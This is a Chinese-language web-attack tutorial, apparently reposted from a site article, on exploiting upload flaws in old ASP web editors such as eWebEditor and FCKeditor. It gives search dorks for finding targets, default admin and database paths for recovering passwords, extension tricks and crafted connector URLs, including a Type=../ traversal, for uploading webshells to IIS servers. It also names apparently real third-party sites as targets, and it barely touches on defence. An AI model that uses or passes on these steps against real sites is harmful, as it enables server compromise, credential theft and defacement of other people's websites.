|
site:editor inurl:asp?id inurl:ewebeditornet 比如常见的编辑器漏洞有: ewebeditor ewebeditornet fckeditor editor southidceditor SouthidcEditor bigcneditor 一:ewebeditor为例 1:默认下载下来的后台: http://www.test.com/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard 拷贝一份(直接修改改不了) 在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览 在编辑器里点设计 然后直接上传asa大马. 上传后 在代码里可以看到马的位置! (原理:因为在iis里 网站的属性里 应用程序配置一项 asa扩展名还是用asp.dll来解析的,asp也是 还有 cer cdx ) 在cer cdx asa的被删掉 那么马儿就找不到 映射不过去. 可以在拷贝过后的样式 图片类型里加入 aaspsp 然后在上传 直接就可以上传asp文件 2:下载默认数据库 www.test.com/ewebeditor/db/ewebeditor.mdb 然后分析数据库 webeditor_system(1) 就可以看到用户名和密码 如果破解不出来 可以在webeditor_style(14 样式表里 主要看允许上传文件的扩展名(s-fileext s_ingeext) 看到一个小黑客曾经搞过 多了asa aaspsp 可以用他来利用!(后台找不到的情况下也可以用此方法) 可以构造语句: 比如 ID=46 s-name =standard1 构造 代码: ewebeditor.asp?id=content&style=standard ID和和样式名改过后 ewebeditor.asp?id=46&style=standard1 然后就是进入编辑器 上传asa 或者asp的 得到webshell 二:ewebeditornet 漏洞利用 默认上传地址: www.test.com/ewebeditornet/upload.aspx 可以直接上传一个cer的木马 在无法上传的情况下 可以地址栏构造以下代码: javascript:lbtnUpload.click(); 然后查看源代码: 找到uploadsave 找到地址 默认传到uploadfile这个文件夹里 (漏洞修补: 可以在iss里直接把upload文件夹的执行权限选择无. ) 三:fckeditor 漏洞利用 http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/ 就把文件名字段改成NEWfile 选择文件名可定义 上传过后在/userfiles/image/找文件 四:southidceditor http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb http://www.xhkjit.com/admin/southidceditor/popup.asp http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp 五:bigcneditor 这个页不多说了 原理都差不多! 防范方法很简单就不多讲了, FCKeditor上传漏洞, http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp 打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是: http://www.xxx.com/UserFiles/all/1.asa “Type=all“ 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制. 比如输入: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp 所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了 而 如果这样输入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../&Connector=connectors/asp/connector.asp 就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了. 所传的文件就到了网站根目录下了 http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46&threadID=457&messageID=532&ListType=FromForum&FromCurrentPage=1&time=1219282232781
(责任编辑:网络) |
|